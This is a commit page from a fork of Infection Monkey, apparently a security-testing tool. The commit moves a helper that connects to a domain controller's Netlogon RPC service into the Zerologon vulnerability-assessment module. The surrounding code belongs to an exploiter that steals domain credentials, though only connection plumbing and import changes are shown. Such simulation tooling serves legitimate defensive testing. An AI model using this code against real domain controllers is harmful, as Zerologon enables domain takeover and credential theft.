p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Move connect_to_dc to vuln_assessment.py

This commit is contained in:
Kekoa Kaaikala 2022-10-07 19:38:18 +00:00
parent 86edb63cb4
commit 374d3d8a50
2 changed files with 20 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
monkey/infection_monkey/exploit/zerologon.py
View File

@ -12,11 +12,10 @@ from binascii import unhexlify
from typing import Dict, List, Optional, Sequence, Tuple
import impacket
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5.dtypes import NULL
from common.agent_events import CredentialsStolenEvent, PasswordRestorationEvent
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from common.credentials import Credentials, LMHash, NTHash, Username
from common.tags import (
T1003_ATTACK_TECHNIQUE_TAG,
@ -27,7 +26,11 @@ from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.wmi_tools import WmiTools
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
from infection_monkey.exploit.zerologon_utils.vuln_assessment import (
connect_to_dc,
get_dc_details,
is_exploitable,
)
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
from infection_monkey.i_puppet import ExploiterResultData
from infection_monkey.utils.capture_output import StdoutCapture
@ -113,16 +116,6 @@ class ZerologonExploiter(HostExploiter):
return self.exploit_result
@staticmethod
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
exploit_attempt_result = self.try_exploit_attempt(rpc_con)
@ -230,7 +223,7 @@ class ZerologonExploiter(HostExploiter):
# Connect to the DC's Netlogon service.
try:
rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
rpc_con = connect_to_dc(self.dc_ip)
except Exception as e:
logger.info(f"Exception occurred while connecting to DC: {str(e)}")
return False

16
monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py
View File

@ -2,9 +2,9 @@ import logging
from typing import Optional, Tuple
import nmb.NetBIOS
from impacket.dcerpc.v5 import nrpc, rpcrt
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from common.utils.exceptions import DomainControllerNameFetchError
from infection_monkey.model import VictimHost
from infection_monkey.utils.threading import interruptible_iter
@ -12,6 +12,16 @@ from infection_monkey.utils.threading import interruptible_iter
logger = logging.getLogger(__name__)
def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
rpc_transport = transport.DCERPCTransportFactory(binding)
rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
rpc_con = rpc_transport.get_dce_rpc()
rpc_con.connect()
rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con
def get_dc_details(host: VictimHost) -> Tuple[str, str, str]:
dc_ip = host.ip_addr
dc_name = _get_dc_name(dc_ip=dc_ip)
@ -39,7 +49,7 @@ def _get_dc_name(dc_ip: str) -> str:
def is_exploitable(zerologon_exploiter_object) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
# Connect to the DC's Netlogon service.
try:
rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip)
rpc_con = connect_to_dc(zerologon_exploiter_object.dc_ip)
except Exception as err:
error_message = f"Exception occurred while connecting to DC: {err}"
logger.info(error_message)